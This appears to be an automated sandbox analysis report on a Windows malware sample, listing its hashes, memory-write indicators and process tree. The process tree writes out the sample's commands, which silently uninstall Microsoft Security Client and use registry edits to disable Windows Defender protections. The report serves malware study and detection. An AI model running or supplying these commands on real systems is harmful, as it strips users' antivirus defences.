Analysis
-
max time kernel
38s -
max time network
14s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
24-11-2020 12:48
Static task
static1
Behavioral task
behavioral1
Sample
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
General
-
Target
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe
-
Size
67KB
-
MD5
e3bc953a18fe466cb008184a45c6c858
-
SHA1
bcf4ffa92efac170177e5b8f9199bd8cf8c8d380
-
SHA256
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b
-
SHA512
f0fd176cce8de8766f34b7d94e428173bdf83fa038611573aabb97dc78c01db3231aadd6fb1e8f0ebea1028238ded4eb8394db307f54fd9bb9eac8443936dc97
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1068 wrote to memory of 288 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 288 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 288 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 288 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1656 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1656 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1656 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1656 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1904 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1904 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1904 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1904 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1988 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1988 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1988 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1988 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 436 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 436 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 436 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 436 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1988 wrote to memory of 532 1988 cmd.exe reg.exe PID 1988 wrote to memory of 532 1988 cmd.exe reg.exe PID 1988 wrote to memory of 532 1988 cmd.exe reg.exe PID 1988 wrote to memory of 532 1988 cmd.exe reg.exe PID 1068 wrote to memory of 556 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 556 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 556 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 556 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 816 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 816 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 816 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 816 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1028 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1028 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1028 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1028 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 556 wrote to memory of 1512 556 cmd.exe reg.exe PID 556 wrote to memory of 1512 556 cmd.exe reg.exe PID 556 wrote to memory of 1512 556 cmd.exe reg.exe PID 556 wrote to memory of 1512 556 cmd.exe reg.exe PID 436 wrote to memory of 600 436 cmd.exe reg.exe PID 436 wrote to memory of 600 436 cmd.exe reg.exe PID 436 wrote to memory of 600 436 cmd.exe reg.exe PID 436 wrote to memory of 600 436 cmd.exe reg.exe PID 1068 wrote to memory of 1492 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1492 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1492 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1068 wrote to memory of 1492 1068 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 816 wrote to memory of 2036 816 cmd.exe reg.exe PID 816 wrote to memory of 2036 816 cmd.exe reg.exe PID 816 wrote to memory of 2036 816 cmd.exe reg.exe PID 816 wrote to memory of 2036 816 cmd.exe reg.exe PID 1028 wrote to memory of 1472 1028 cmd.exe reg.exe PID 1028 wrote to memory of 1472 1028 cmd.exe reg.exe PID 1028 wrote to memory of 1472 1028 cmd.exe reg.exe PID 1028 wrote to memory of 1472 1028 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files(x86)\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/288-0-0x0000000000000000-mapping.dmp
-
memory/436-4-0x0000000000000000-mapping.dmp
-
memory/532-5-0x0000000000000000-mapping.dmp
-
memory/556-6-0x0000000000000000-mapping.dmp
-
memory/600-10-0x0000000000000000-mapping.dmp
-
memory/816-7-0x0000000000000000-mapping.dmp
-
memory/1028-8-0x0000000000000000-mapping.dmp
-
memory/1472-13-0x0000000000000000-mapping.dmp
-
memory/1492-11-0x0000000000000000-mapping.dmp
-
memory/1512-9-0x0000000000000000-mapping.dmp
-
memory/1656-1-0x0000000000000000-mapping.dmp
-
memory/1904-2-0x0000000000000000-mapping.dmp
-
memory/1988-3-0x0000000000000000-mapping.dmp
-
memory/2036-12-0x0000000000000000-mapping.dmp